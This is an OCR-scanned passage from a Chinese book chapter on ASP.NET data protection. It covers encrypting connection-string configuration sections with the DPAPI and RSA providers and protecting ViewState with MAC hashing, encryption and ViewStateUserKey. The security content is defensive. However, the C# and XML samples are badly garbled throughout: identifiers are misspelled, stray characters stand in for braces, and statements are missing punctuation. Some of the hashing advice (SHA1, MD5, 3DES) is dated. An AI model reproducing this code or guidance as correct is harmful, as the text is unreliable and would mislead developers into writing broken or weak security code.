if (!connStrings .SectionInformation.IsProtected) 


{ 
if (!connstrings.ElementInformation.IsLocked) 
{ 
// 加 密 配置 节 
connStrings .SectionInformation.ProtectSection (provider); 
connStrings .SectionInformation.ForceSave = true; 
config.Save (ConfigurationSaveMode.Ful1) 
Console.WriteLine("Section {0} is now protected by {1}", 
connStrings.SectionInformation.Name， 
connStrings.SectionInformation.ProtectionProvider.Name) 
} 
else 
Console.WriteLinel( 
"Can't protect, section {0} is locked", 
connstrings.SectionInformation.Name); 
h 
else 
Console.WriteLinel( 
"Section {0} is already protected by {1}", 
connStrings .SectionInformation.Name， 
connStrings .SectionInformation.ProtectionProvider .Name) 
} 
else 
Console.WriteLine("Can't get the section {0}", 
connstrings.SectionInformation.Name); 


上 
// 解密 配置 节 信息 


private static void UnProtectConfiguration() 
{ 
// 读 取 配置 文件 


System.Configuration.Configuration config =ConfigurationManager. 
OpenExeConfiguration( ConfigurationUserLevel .None); 


// 获取 解密 配置 节 
ConfigurationSection connStrings =config.Connectionstrings; 
if (connStrings != null) 


LU 


if (connStrings .SectionInformation.IsProtected) 


{ 


if (!connStrings -ElementInformation.IsLocked) 


{ 
// 解密 


connStrings -SectionInformation-UnprotectSection () 7 
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connstrings.SectionInformation.ForceSave = true; 

config.Save (ConfigurationSaveMode.Full); 

Console.WriteLine("Section {0} is now unprotected.", 
connSstrings.SectionInformation.Name); 


1 
else 
Console.WriteLine( 
"Can't unprotect, section {0} is locked", 
connstrings.SectionInformation.Name); 
|! 
else 
Console.WriteLine( 
"Section {0} is already unprotected.", 
connstrings.SectionInformation.Name); 
} 
else 


Console.WriteLine("Can't get the section {0}", 
connstrings.SectionInformation.Name); 
} 
// 输出 结果 的 主 函数 
public static void Main(string[] args) 
{ 
string selection = string.Empty; 
if (args.Length == 0) 
i 
Console.WriteLine( 
"Select protect or unprotect"); 
return; 
selection = args[0] .ToLower(); 
switch (selection) 
{ 
case "protect": 
ProtectConfiguration(); 
break; 
case "unprotect": 
UnProtectConfiguration(); 
break; 
default: 
Console.WriteLine ("Unknown selection"); 
break; 
} 
Console.Read (); 


} 
加 密 前 的 XML 配置 节 代码 如 下 : 


<?xml version="1.0" encoding="utf-8" ?> 
<configuration> 
<connectionSstrings> 
<add name="ConnectionString" 
connectionString="Data Source=web;Initial Catalog=Test db;User 
ID=aspnet;Password=test" 
providerName="System.Data.SqlClient" /> 
</connectionStrings> 
</configuration> 


加 密 后 的 XML 配置 节 XML 代码 如 下 : 


<?xml version="1.0" encoding="utf-8"?> 
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<configuration> 
<connectionstrings> 
<EncryptedData> 
<CipherData> 
<CipherValue>DDDKKMDMNd8BFdERjHOAwE/Cl+sBAAAACAMhO0jIC1kigyFfd9AUZfQQAAA 
ACAAAAAAADZgAAqAAAABAAAADQWwbQ2DgIgIlqskE1RI9UPAAAAAASAAACIAAAAEAAAAAX1Y 
Bxi3jhM6wv4sxLhugsQAgAAgoReHZS2406dc/AyRDd6WuNr4ihHn6fbipd4tzHEmeuyS404 
£fS4CmT3jMt/WjsP/kR7TFAygwr2GG47podK79ECpVCZHAgctCauCYjE2Ls3iphKXy/pHic2 
o6aaClt/xPm+fb40fODv6XjrJhJzGK21qUPXkyJN1w2zwh60VpDQF9N8vTyxL4eitp35/M5 
ZYbW7Te6VVAgYUOx1NxgCV5+jXpUKh/rPovopTD392u8KavqQFW1iu+gBPSPq/xeZNz+qYMK 
bUl+r4VTzBQg3fPl1Rxpll1NZmM2yRgUbkYPNaFb9ihS7GAg5/wZzn81LmThvq39eAOV1p6hDE 
92iop885umELt0/NBKf5umQCqqz9EXXLbmmGc7qoLqTaYVuOmqx0LsvrJLOwSL1dSySCjmB 
/dNAtVUYgg02eWQNKyaLqnpMdCbTLLQ/oCKuUNkL50Q7t1lyl5wQGjQhieIRzLtrMgpTSyaHb 
qDsRurp9Bc5mMO78IAglhXquQNK1JC/wiJ9kbHerFCbtuLGy/7nXVrFH91ud4U4ExCJEuho 
Tdmuql5kbqYd6Ye/bu2CftPnil9nDkSJ8wANoqMNKbK3Mi /Cd0o113HsVY1ETMv1v1 JWZWY 
P91PK9trixiY4E0G81c6IKITjHDrOJ9evdw2T1/TrvY6pzre3UXSJbFMDQVX6JOAXxFKO02SR 
ZDKOZdRojeoX191grFAAAABzj1z3Qg2as3vn70O0INFS</CipherValue> 
</CipherData> 
</EncryptedData> 
</connectionstrings> 
<configProtectedData defaultProvider="RsaProtectedConfigurationProvider"> 
<providers> 
<clear /> 
<add useMachineProtection="true" description="Uses CryptProtectData and 
CryptUnProtectData Windows APIs to encrypt and decrypt" 
keyEntropy="" name="DataProtectionConfigurationProvider" 
type="System.Configuration.DpapiProtectedConfigurationProvider,System. 
Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken= 
b03f5f7f11dq50a3a"” /> 
</providers> 
</configProtectedData> 
</configuration> 


4.4.2 RsaProtectedConfigurationProvider 类 


本 小 节 详 细 介 绍 如 何 利用 类 RsaProtectedConfigurationProvider 实施 配置 文件 的 加 解 
密 ， 该 类 使 用 RSA 加 密 算法 对 数据 进行 加 密 和 解密 。 

RsaProtectedConfigurationProvider 类 提供 实例 所 需要 的 type 和 description 属性 。 表 4-2 
所 示 为 RsaProtectedConfigurationProvider 的 配置 选项 。 


表 4-2 RsaProtectedConfigurationProvider 的 配置 选项 





属 性 说 明 
type 受 保护 配置 提供 程序 的 类 型 
Description 提供 程序 实例 的 说 明 





keyContainerName 用 于 加 密 或 解密 Web.config 文件 内 容 的 RSA 密 钥 容 器 的 名 称 
如 果 RSA 密 钥 容 器 是 计算 机 级 密 钥 容 器 ， 则 为 true; 如 果 RSA 密 钥 容器 是 用 
useMachineContainer | 户 级 密 钥 容器 ， 则 为 false。 有 关 更 多 信息 ,请 参见 使 用 受 保护 的 配置 加 密 配 置 








信息 
UseOAEP 如 果 加 密 和 解密 时 使 用 最 优 非 对 称 加 密 填 充 (OAEP) ， 则 为 true; 否则 为 false 
cspProviderName Windows 密码 API (crypto API) 密码 服务 提供 程序 的 名 称 


RsaProtectedConfigurationProvider 类 提供 方法 以 加 密 存储 在 配置 文件 中 的 敏感 信息 ， 
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这 有 助 于 防止 未 经 授权 的 访问 。 通 过 声明 该 提供 程序 并 在 配置 文件 中 进行 相应 的 设置 ， 可 
使 用 内 置 的 RsaProtectedConfigurationProvider。 

下 面 的 实例 说 明 如 何 使 用 标准 RsaProtectedConfigurationProvider 类 来 保护 或 取消 保护 
配置 节 。 实 例 代码 包括 3 个 方法 : ProtectConfiguration 用 于 加 密 XML 配置 节 ，UnProtect- 
Configuration 用 于 解密 XML 配置 节 ，Main 用 于 执行 主 函 数 。 

实例 代码 代码 如 下 : 

using System; 

using System.Configuration; 


public class UsingRsaProtectedConfigurationProvider 











// 解密 数据 
private static void ProtectConfiguration () 
{ 
// 读 取 配置 文件 
System.Configuration.Configuration config =ConfigurationManager. 
OpenExeConfiguration( ConfigurationUserLevel.None); 
// 定义 加 密 类 型 名 称 
string provider = "RsaProtectedConfigurationProvider"; 
// 获取 数据 库 连 接 串 
ConfigurationSection connStrings = config.Connectionstrings; 
// 判断 连接 状态 
if(connStrings != null) 
i 
if(!connStrings .SectionInformation.IsProtected) 
{ 
if(!connStrings .ElementInformation.IsLocked) 
{ 
// 加 密 数 据 库 连接 串 
connStrings .SectionInformation.ProtectSection (provider); 
connStrings .SectionInformation.ForceSave = true; 
config.Save (ConfigurationSaveMode.Full); 
Console.WriteLine("Section {0} is now protected by {1}", 
connstrings.SectionInformation.Name, 
connstrings.SectionInformation.ProtectionProvider.Name); 
} 
else 
Console.WriteLinel( 
"Can't protect, section {0} is locked", 
connstrings.SectionInformation.Name); 


} 
else 
Console.WriteLine( 
"Section {0} is already protected by {1}", 
connStrings .SectionInformation.Name， 
connStrings .SectionInformation.ProtectionProvider.Name) 
| 
else 


Console.WriteLine("Can't get the section {0}", 
connstrings.SectionInformation.Name); 


1 
// 解密 数据 
private static void UnProtectConfiguration() 


{ 
// 获取 程序 配置 信息 
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System.Configuration.Configuration config =ConfigurationManager. 
OpenExeConfiguration (ConfigurationUserLevel .None); 


// 读 取 配 置 节 
ConfigurationSection connStrings = config.ConnectionSstrings; 
if(connstrings != null) 


{ 
if(connstrings.SectionInformation.IsProtected) 
t 
if(!connStrings .ElLementInformation.IsLocked) 
{ 
// 指定 解密 配置 节 
connstrings.SectionInformation.UnprotectSection(); 
connStrings .SectionInformation.ForceSave = true; 
config.Save (ConfigurationSaveMode.Full); 
// 保存 解密 结果 
Console.WriteLine("Section {0} is now unprotected.", 
connSstrings.SectionInformation.Name); 
} 
else 
Console.WriteLine( 
"Can't unprotect, section {0} is locked", 
connstrings.SectionInformation.Name); 
} 
else 
Console.WriteLinel( 
"Section {0} is already unprotected.", 
connstrings.SectionInformation.Name); 
} 
else 
Console.WriteLine("Can't get the section {0}", 
connstrings.SectionInformation.Name); 
} 
// 主 函数 
public static void Main(string[] args) 
{ 
string selection = string.Empty; 
if(args.Length == 0) 


{ 
Console.WriteLine( 
"Select protect or unprotect"); 
return; 
EF 


selection = args[0] .ToLower(); 
switch(selection) 
{ 
// 加 密 状 态 
case "protect": 
ProtectConfiguration(); 
break; 
// 解密 状态 
case "unprotect": 
UnProtectConfiguration(); 
break; 
default: 
Console.WriteLine ("Unknown selection"); 
break; 
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Console.Read(); 
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4.5 保护 视图 数据 


视图 状态 是 每 一 个 主流 Web 开发 语言 都 有 的 技术 ， 人 允许 页 面 在 回 传 时 保持 表单 属性 。 
每 一 次 提交 页 面 都 可 以 获得 所 有 表单 控件 的 当前 状态 ， 并 且 将 它们 作为 编码 字符 串 存储 在 
一 个 隐藏 的 表单 字段 中 。 视 图 状态 的 风险 是 攻击 者 能 够 查看 或 修改 这 些 表单 值 ， 以 实现 
攻击 。 

为 了 防范 类 似 的 攻击 ， 诸 如 JSP 或 ASPNET 都 允许 使 用 加 密 来 保护 视图 状态 数据 ， 
并 用 哈 希 算 法 检测 恶意 修改 。 

视图 状态 的 安全 主要 通过 以 下 5 种 方式 进行 保护 : 


1. 保证 视图 状态 哈 希 值 


视图 状态 数据 存储 在 页 面 上 的 隐藏 字段 中 , 使 用 Base64 编码 机 制 进 行 编码 , 并 使 用 计 
算 机 身份 验证 代码 密 钥 从 视图 状态 数据 中 创建 这 些 数据 的 哈 希 。 该 哈 希 值 会 添加 到 编码 的 
视图 状态 数据 中 , 并 且 生 成 的 字符 串 会 存储 在 页 面 中 。 当 页 面 被 回 传 到 服务 器 时 , ASP.NET 
框架 会 重新 计算 哈 希 值 ， 并 将 其 与 视图 状态 中 存储 的 值 进 行 比较 。 如 果 哈 希 值 不 匹配 ， 将 
引发 异常 ， 指 示 视 图 状态 数据 可 能 无 效 。 

通过 创建 哈 希 值 ，ASP.NET 框架 可 以 测试 视图 状态 数据 是 否 已 被 损坏 或 自 改 。 但 是 ， 
即使 视图 状态 数据 未 被 算 改 ， 这 些 数 据 仍 然 可 能 被 恶意 用 户 截获 和 读 取 。 


2. 使 用 MAC 密 钥 计算 视图 状态 哈 希 值 


用 于 计算 视图 状态 哈 希 值 的 MAC 密 钥 可 以 自动 生成 ， 也 可 以 在 Machine.config 文件 
中 指定 。 如 果 该 密 钥 自动 生成 ， 则 基于 计算 机 的 MAC 地 址 〈 它 是 该 计算 机 中 网 络 适 配器 
的 唯一 GUID 值 ) 进行 创建 。 

恶意 用 户 很 难 根据 视图 状态 中 的 哈 希 值 进行 反 向 工程 处 理 以 推断 出 MAC 密 钥 。 因 此 ， 
MAC 编码 是 一 种 用 来 确定 视图 状态 数据 是 否 已 更 改 的 可 靠 方 式 。 

通常 用 于 生成 哈 希 的 MAC 密 钥 越 大 ， 不 同 字符 串 的 哈 希 值 相同 的 可 能 性 就 越 小 。 如 
果 密 钥 是 自动 生成 的 ， 则 ASP.NET 使 用 SHA1 编码 来 创建 一 个 大 型 密 钥 。 不 过 ， 在 网 络 
场 环境 中 ， 所 有 服务 器 的 密 钥 必须 相同 。 如 果 密 钥 不 同 ， 那 么 当 页 面 回 传 至 创建 该 页 的 服 
务 器 之 外 的 其 他 服务 器 时 ，ASPNET 页 框架 将 引发 异常 。 

因此 ,在 网 络 场 环境 中 ， 应 在 Machine.config 文件 中 指定 密 钥 ,而 不 是 让 ASPNET 自 
动 生成 。 这 种 情况 下 应 确保 创建 的 密 钥 足 够 长 ， 以 便 使 哈 希 值 上 只 有 充分 的 安全 性 。 但 是 ， 密 钥 
越 长 ， 创 建 哈 希 所 需要 的 时 间 也 就 越 多 。 因 此 ， 必 须 在 安全 需求 与 性 能 需求 之 间 进 行 权衡 。 


3. 视图 状态 加 密 











虽然 MAC 编码 有 助 于 防止 自 改 视图 状态 数据 ， 但 这 种 编码 也 会 妨碍 用 户 查看 数据 。 
可 以 通过 下 面 两 种 方式 来 防止 他 人 查看 此 数据 : 通过 SSL 传输 页 面 和 加 密 视图 状态 数据 。 
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要 求 通过 SSL 发 送 页 面 有 助 于 防止 那些 原本 不 应 该 收 到 该 页 面 的 人 探查 数据 包 和 未 经 授权 
访问 数据 。 

但 是 ， 请 求 页 面 的 用 户 仍然 能 够 查看 视图 状态 数据 ， 因 为 SSL 会 解密 页 面 以 便 在 浏览 
器 中 进行 显示 。 如 果 不 担心 视图 加 密 的 信息 被 认证 用 户 查 看 ， 则 可 以 使 用 。 但 在 某 些 情况 
下 ， 控 件 可 能 会 使 用 视图 状态 存储 任何 用 户 都 不 应 访问 的 信息 。 

例如 ， 请 求 页 面 中 可 能 包含 一 个 数据 绑 定 控件 ， 该 控件 存储 视图 状态 的 项 标识 符 〈 数 
据 密 钥 ) 。 如 果 这 些 标识 符 中 包含 敏感 数据 (如 客户 ID) ， 则 应 对 视图 状态 数据 进行 加 密 
来 替代 通过 SSL 发 送 页 面 ， 或 是 将 其 作为 通过 SSL 发 送 页 面 的 补充 方法 。 

若 要 加 密 数据 ， 页 面 的 ViewStateEncryptionMode 属性 应 设置 为 tue。 在 视图 状态 中 存 
储 信息 时 ， 可 以 使 用 常规 的 读 写 技 术 。 该 页 面 会 为 使 用 者 处 理 所 有 加 密 和 解密 工作 。 对 视 
图 状态 数据 进行 加 密 可 能 会 影响 应 用 程序 的 性 能 。 


4. 控件 状态 加 密 


通过 调用 RegisterRequiresViewStateEncryption 方法 对 视图 状态 加 密 。 如 果 页 面 中 的 任 
何 控件 都 要 求 对 视图 状态 进行 加 密 ， 则 该 页 面 中 的 所 有 视图 状态 都 会 进行 加 密 。 


5. 基于 每 个 用 户 的 视图 状态 编码 


如 果 网 站 需要 对 用 户 进行 身份 验证 ， 则 可 以 设置 Page_Init 事件 处 理 程序 中 的 
ViewStateUserKey 属性 ， 以 便 将 页 面 的 视图 状态 与 特定 用 户 相 关联 。 这 将 有 助 于 防止 一 键 
式 〈one-click) 攻击 。 攻 击 者 随后 引诱 受害 者 单 击 一 个 链接 ， 该 链接 使 用 受害 者 的 标识 向 
服务 器 发 送 页 面 。 

如 果 设 置 了 ViewStateUserKey 属性 , 将 使 用 攻击 者 的 标识 来 创建 原始 页 面 的 视图 状态 
的 哈 希 。 受 害 者 被 引诱 重新 发 送 此 页 面 时 ， 由 于 用 户 密 钥 不 同 ， 因 此 哈 希 值 也 将 不 同 。 这 
样 ， 页 面 的 验证 将 失败 ， 并 且 引 发 一 个 异常 。 

必须 将 ViewStateUserKey 属性 与 每 个 用 户 的 一 个 唯一 值 (如 用 户 名 或 标识 符 ) 相 关联 。 

下 面 我 们 对 其 中 的 几 种 重要 方式 作 详细 说 明 。 


4.5.1 开启 视图 保护 开关 


开发 人 员 通 过 设置 参数 可 以 在 机 器 、 应 用 程序 、 页 面 或 控件 级 别 上 启用 视图 状态 。 作 
为 开发 人 员 希 望 为 整个 系统 启用 视图 状态 ， 但 同时 也 希望 有 更 多 灵活 的 选择 ， 以 减少 暴露 























给 攻击 的 风险 。 
表 4-3 所 示 为 在 各 种 级 别 中 使 用 不 同 的 配置 参数 。 
表 4-3 配置 选项 

作用 域 配 置 
服务 器 在 machine.config 文件 中 ， 设 置 <pages enableViewState="true"/> 
应 用 程序 | 在 web.config 文件 中 ， 设 置 <pages enableViewState="true"/> 
页 面 在 页 面 源 代码 中 ， 使 用 <% @page enableViewState="true”%>; 或 者 ， 在 代码 中 设置 

Page.EnableViewState="true”" 

控件 在 页 面 源 代码 中 ， 设 置 控件 属性 EnableViewState= "true" 
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熟悉 视图 的 开发 人 员 都 知道 视图 是 未 加 密 的 ， 它 仅仅 使 用 了 base 64 编码 方式 。 可 以 
使 用 ViewState Decoder 工具 以 图 形 化 的 方式 解码 和 查看 数据 。 

以 ViewState Decoder 工具 为 例 ， 黑 客 只 需 将 获取 的 视图 数据 复制 到 左边 的 文本 框 内 
容 ， 在 右边 即 可 显示 视图 所 表达 的 控件 状态 和 原始 数据 。 数 据 还 原 结果 如 图 4-3 所 示 。 
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图 4-3 ”窥探 视图 数据 


视图 状态 表示 表单 的 控件 属性 ， 所 以 攻击 者 能 够 通过 修改 视图 状态 属性 来 改动 表单 。 
例如 ， 攻 击 者 可 以 改变 在 线 购物 车 上 的 产品 价格 ， 或 者 修改 参数 以 执行 SQL 注入 攻击 。 攻 
击 者 可 能 会 尝试 许多 其 他 类 型 的 攻击 ， 如 跨 站 点 脚本 、 未 授权 文件 访问 或 缓存 溢出 等 。 

为 了 防止 攻击 者 操纵 视图 状态 ， 可 以 使 用 一 个 消息 验证 代码 (MAC) 。MAC 实质 上 
是 一 个 确保 其 完整 性 的 数据 哈 希 , 可 以 在 机 器 、 应 用 程序 或 页 面 级 别 上 启用 视图 状态 MAC 。 

启用 了 MAC 检查 时 (默认 情况 ) ， 将 对 序列 化 的 视图 状态 附加 一 个 哈 希 值 ， 该 值 是 
使 用 某 些 服务 器 端 值 和 视图 状态 用 户 密 钥 〈 如 果 有 ) 生成 的 。 回 传 视图 状态 时 ， 将 使 用 新 
的 服务 器 端 值 重 新 计算 该 哈 希 值 ， 并 将 其 与 存储 的 值 进行 比较 。 如 果 两 者 匹配 ， 则 允许 请 
求 ; 否则 将 引发 异常 。 

即使 假设 黑客 具有 破解 和 重新 生成 视图 状态 的 能 力 ， 他 仍 需 要 知道 服务 器 存储 的 值 才 
可 以 得 出 有 效 的 哈 希 。 有 具体 说 来 ， 该 黑客 需要 知道 machine.config 的 <machineKey> 项 中 引 
用 的 计算 机 密 钥 。 

服务 器 默认 情况 下 是 自动 生成 的 ， 以 物理 方式 存储 在 LSA (Windows Local Security 
Authority) 中 。 仅 在 Web 〈 此 时 视图 状态 的 计算 机 密 钥 必须 在 所 有 的 计算 机 上 都 相同 ) 的 
情形 下 ， 才 应 当 在 machine.config 文件 中 将 其 指定 为 明文 。 
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视图 状态 MAC 检查 是 通过 名 为 EnableViewStateMac 的 @Page 指令 属性 控制 的 。 如 前 
所 述 ， 默 认 情 况 下 ， 它 被 设置 为 tue。 笔 者 建议 永远 不 要 禁用 它 ; 否则 将 会 使 视图 状态 自 
改 攻击 成 为 可 能 ， 并 具有 很 高 的 成 功 概率 。 

EnableViewStateMac 验证 流程 如 图 4-4 所 示 。 
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图 4-4 EnableViewStateMac 验证 流程 














MAC 可 防止 某 些 人 随意 修改 视图 状态 数据 ， 如 果 MAC 不 匹配 则 废弃 其 内 容 。 然 而 ， 
仍然 可 以 使 用 前 面 提 及 的 ViewState Decoder 工具 来 解码 并 查看 视图 状态 的 内 容 。 为 了 克服 
这 个 问题 ， 可 以 加 密 视图 状态 字段 的 内 容 ， 使 用 machine.config 文件 中 的 machineKey 元 素 
配置 这 种 加 密 。 

下 面 的 代码 示例 演示 如 何 将 验证 字段 validationKey 和 密 钥 字 段 decryptionKey 属性 都 
设置 为 自动 生成 AutoGenerate。 并 且 ， 指 定 isolateApps 值 ， 以 便 为 服务 器 上 的 每 个 应 用 程 
序 生成 一 个 唯一 的 密 钥 。 

MAC 机 器 密 钥 配 置 XML 代码 如 下 : 


<machineKey 
validationKey="AutoGenerate, IsolateApps" 
decryptionKey="AutoGenerate, IsolateApps" 
Validation="SHR1" 
J 
上 述 加 密 验 证 的 类 型 属性 设置 为 SHA1， 也 可 以 替换 成 MD5 或 3DES。 前 两 个 加 密 算 
法 属性 使 ASPNET 创建 MD5 或 SHA-1 MAC 哈 希 ， 而 3DES 则 加 密 视图 状态 内 容 并 创建 
SHA-1 MAC。 将 验证 有 效 性 的 模式 设置 为 3DES， 可 保护 数据 不 被 查看 ， 并 且 防 止 参数 操 
纵 的 攻击 。 但 是 ， 这 仍然 无 法 使 视图 状态 彻底 安全 。 攻 击 者 可 以 预先 填写 表单 ， 保 存 视 图 
状态 字段 ， 然 后 欺骗 另 一 个 用 户 使 用 该 表单 。 为 了 防止 这 种 类 型 的 攻击 ，ASP.NET 允许 为 
每 个 用 户 设置 一 个 独特 的 密 钥 ， 使 视图 状态 数据 只 对 该 用 户 有 效 ， 在 page_init 事件 中 设置 
page 对 象 的 ViewStateUserKey 属性 。 对 于 经 过 验证 的 用 户 , 可 以 将 该 属性 设置 为 用 户 的 名 
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称 或 会 话 ID。 对 于 匿名 的 用 户 ， 应 该 创建 一 个 随机 数 ， 并 且 将 其 保存 在 用 户 的 Cookie 中 。 
4.5.2 ”加 密 视图 信息 


除了 设置 视图 参数 之 外 ， 如 何 加 密 也 是 保护 视图 数据 的 关键 。.NET 技术 使 用 
Page.RegisterRequiresViewStateEncryption 方法 将 控件 注册 为 需要 视图 状态 加 密 的 控件 。 

当 开 发 人 员 需 要 研发 用 于 处 理 潜在 的 敏感 信息 的 自 定 义 控件 ， 则 必须 启用 
RegisterRequiresViewStateEncryption 方法 向 页 面 注册 控件 ， 以 确保 该 控件 的 视图 状态 信息 
已 加 密 。 

加 密 之 前 需要 设置 加 密 模式 ， 属 性 名 是 ViewStateEncryptionMode。 通 过 设置 获取 或 设 
置 视图 状态 的 加 密 模式 ， 加 密 行为 可 以 自动 完成 。 

在 实际 开发 中 ， 很 多 开发 人 员 喜 欢 直 接 从 数据 库 获取 数据 源 并 且 绑 定 到 数据 表 控 件 。 
这 种 方法 在 Java 或 ASPNET 等 技术 中 广泛 运用 。 但 这 样 的 做 法 存在 不 安全 的 因素 ， 会 为 
黑客 提供 一 些 用 户 的 操作 数据 ， 这 是 非常 危险 的 。 

下 面 的 实例 说 明 如 何 为 Page 对 象 设置 视图 状态 加 密 模式 并 通过 RegisterRequiresView- 
StateEncryption 加 密 视图 状态 。 该 实例 最 终结 果 是 使 从 数据 库 获 取 数据 的 同时 ， 将 它们 在 
显示 控件 的 视图 中 加 密 。 

实例 代码 如 下 : 

<%@ Page Language="C#" AutoEventWireup="true" $%> 


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http: 
//Wwww.w3.0rg/TR/xhtml1/DTD/xhtmll-transitional.dtd"> 


<script runat="server"> 
void Page Load (Object sender, EventArgs e) 
if(IsPostBack) 
i 
if (yesRetrieve.Checked) 
出 
Page.RegisterRequiresViewStateEncryption(); 
// 创建 数据 库 连接 
System.Data.SqlClient.SqlConnection conn = new System.Data. 
SqlClient.SqlConnection ("server=localhost;database= 
NorthWind; Integrated Security=SSPI"); 
System.Data.SqlClient.SqlCommand command =conn.Create-— 
Command (); 
// 查询 数据 
command.CommandText = "Select [CustomerID] From [Customers]"; 
conn.Open(); 
System.Data.SqlClient .SqlDataReader reader =command.Execute-— 
Reader (); 
// 读 取 用 户 编号 字段 
customerid.Text = reader["CustomerID"] .ToString(); 
// 赋值 于 文本 控件 
reader.Close(); 
conn.Close(); 
} 
else 


{ 
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customerid.Text = "Not retrieved"; 


} 
} 
</script> 
// 界面 HTML 代码 
<html > 
<head id="Headl" runat="server"> 
<title>Customer Information</title> 
</head> 
<body> 
<form id="forml" runat="server"> 
<div> 
Customer identifier: 
<asp:Label ID="customerid" runat="server" Text="Not available" /> 
<br /> 
Retrieve customer info: 
<asp:RadioButton ID="yesRetrieve" Text="yes" runat="server" GroupName= 


"groupl" /> 
<asp:RadioButton ID="noRetrieve" Text="no" runat="server" GroupName= 
"groupl" /> 
<br /> 
<asp:Button ID="Buttonl" runat="server" Text="Submit" /> 
</div> 
</form> 
</body> 
</html> 





加 密 后 的 文本 控件 仍然 能 够 正常 的 显示 数据 , 但 是 在 黑客 查看 HTML 代码 时 , 视图 数 


据 已 经 被 散 列 加 密 了 ， 类 似 如 下 的 HTML 代码 : 


<input type="hidden" name=" VIEWSTATE"id=" VIEWSTATE" 
value="J62G77yDilrdf8+ZXszWld3eAPnuz08h2MCNPEN2HR6daQNjLLamfq4EHwWRRJ16 
S6kHFp43gwVPKMB9RPQtMaIl5Gc+12Z90rQjsZWpvaVDTBIAfF6wFRj7qY1r2hREghEQYM/el 
a+JX9oiWk1l1kUs8vFJ3SNeXCkCdDb7fQtr6D1CKsbCGGWDrawgiIsI005pnYMP1oa+z74c1Y 
6/DYZ23BIAZNNYDLML/e7mVIZzZSS+VAFBZsXxBBdRx1oWJ60wjrfkScllg0Dpbn+LZ2NIu7n 
h2t5Xu8iTW1NmjSfUoH9ymBmQkCNek3jaexl18n9wBOdLGsQ8Zx0/hAGVqbcqTQStiuRYezj 
vm8T9Q0U9cj9SI+FNS2PkKtVHXqh6qLsjH1Dlwm+qFyjHK2fvbH+WA2NZUq3HzObR4GZzNFR1 
Zn82Z1i0/FDJEKyH+x9X7qneaJs9dTg6mo/qbvI+SOWl1viQ/nj/OrC3PoiLwvwydlWjB1ND4 
B21rVjnoq/J+jPNQGE+AdQOR2fW3kYAtGhKf6PSVmMUm9f226JY2rkYw2vBahPWmxHqnf9V5y 
七 /0D3LP9Mx7KYaYy4PAItTeEzIT4G5I0Hp65a8d/QoJUbQoTCcs10z798Mei66mqF8QrOBxR2EU 
sStuCekxQe+2xDhX2kkxntoqxgRJ4/n8cdKr2Z+K3F3IEmxObo+QvQS5wUtMWrsKIY8Jad56 
2zCNBGjl1yU72i+KuUORHQCBoXRgt5vPeIBpdjbOVk3tb6t7g2T5yFyB7PBTqEwV43Ws4/BPx 
Ysdr9YCNOJd/TB6cDISFUS/dGYTej2EZt2HOPCM758WeEwBQZuG+t1dFEZU6+vicImHDV8i 
fCwNv+Yhw==" /> 

</div> 


4.5.3 ”用 户 独立 视图 





动作 。Java 或 .NET 框架 都 引入 类 似 ViewStateUserKey 的 技术 来 实现 独立 视图 功能 ， 
面相 关联 的 视图 状态 变量 中 一 个 标识 符 分 配给 单个 用 户 。 








用 户 独 立 视图 提供 了 附加 的 输入 以 创建 防止 视图 状态 被 算 改 的 哈 希 值 ， 有 效 防止 黑 


用 户 独立 视图 的 出 现 , 标志 着 Web 系统 能 够 根据 不 同 用 户 的 访问 请 求 做 出 不 同 的 响应 


Ha 页 
CC 贝 





攻击 。 换 句 话 说 ，ViewStateUserKey 使 得 黑客 使 用 客户 端 视图 状态 的 内 容 来 准备 针对 站 点 


的 恶意 张贴 困难 了 许多 。 可 以 为 该 属性 分 配 任何 非 空 的 字符 串 ， 但 最 好 是 会 话 ID 或 
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ID。 





类 似 的 黑客 攻击 将 恶意 的 HTTP 表单 提交 到 等 待 表单 的 页 面 。 页 面 将 使 用 张贴 来 的 数 
据 执行 某 些 敏感 操作 。 攻 击 者 了 解 如 何 使 用 各 个 域 ， 并 想 出 一 些 虚假 值 来 达到 目的 。 这 通 
常 是 目标 特定 的 攻击 ， 而 且 由 于 它 所 建立 的 三 角 关系 ， 很 难 追 本 溯源 导致 恶意 代码 被 张贴 





到 第 三 个 站 点 ， 事 实 上 形成 了 跨 站 点 攻击 ， 如 图 4-5 所 示 。 
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图 4-5 冒名 攻击 流程 


冒名 攻击 要 想 得 手 ， 黑 客 必须 能 够 访问 该 页 面 ， 此 时 黑客 会 在 本 地 保存 该 页 面 。 这 样 


就 可 以 访问 _VIEWSTATE 域 并 使 用 该 域 ， 用 旧 的 视图 状态 和 其 他 域 中 的 恶意 值 包 





建 请 求 。 


设置 ViewStateUserKey 属性 有 助 于 防止 应 用 程序 受到 恶意 用 户 的 点 击 式 攻击 。 具体 实 
现 方式 是 ， 允 许 开发 人 员 为 各 个 用 户 的 视图 状态 变量 分 配 一 个 标识 符 ， 使 他 们 不 能 使 用 该 


变量 来 生成 点 击 式 攻击 。 


所 有 用 户 将 ViewStateUserKey 设置 为 常量 字符 串 ， 相 当 于 将 它 保留 为 空 。 开 发 人 员 必 











须 将 它 设置 为 对 各 个 用 户 都 不 同 的 值 。 由 于 一 些 技 术 和 社会 原因 ， 会 话 ID 更 为 合适 ， 因 




















为 会 话 ID 不 可 预测 ， 会 超时 失效 ， 并 且 对 于 每 个 用 户 来 说 都 是 不 同 的 。 














以 下 代码 实例 将 通过 会 话 编号 标示 用 户 的 唯一 身份 ， 并 在 页 面 初始 化 时 被 执行 


void Page Init (object sender, EventArgs e) 





上 
ViewStateUserKey = Session.SessionID; 
} 
为 了 避免 重复 编写 这 些 代码 ， 读 者 可 以 将 它们 固定 在 从 Page 派生 的 类 的 OnInit 虚拟 


方法 中 (请 注意 必须 在 Page.Init 事件 中 设置 此 属性 ) : 
protected override OnInit (EventArgs e) 
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base.OnInit (e); 
ViewStateUserKey = Session.SessionID; 


| 


4.6 数据 保护 


本 章 讲述 了 如 何 利用 哈 希 ， 配 置 等 手段 保护 数据 。 为 了 更 进一步 保护 数据 ， 则 需要 直 
接 通 过 密 匙 的 方式 进行 加 密 。 这 种 方式 在 安全 性 和 强度 上 都 比 其 他 方法 更 加 的 稳固 。 

在 .NET 安全 命名 空间 Crypttography 下 定义 了 3 种 类 型 的 加 密 方法 ， 它 们 是 非 对 称 算 
法 、 对 称 算法 和 哈 希 算法 。 所 有 的 这 些 类 (和 .NET 密码 学 类 型 ) 都 是 抽象 类 。 





症 


4.6.1 对 称 加 密 算法 


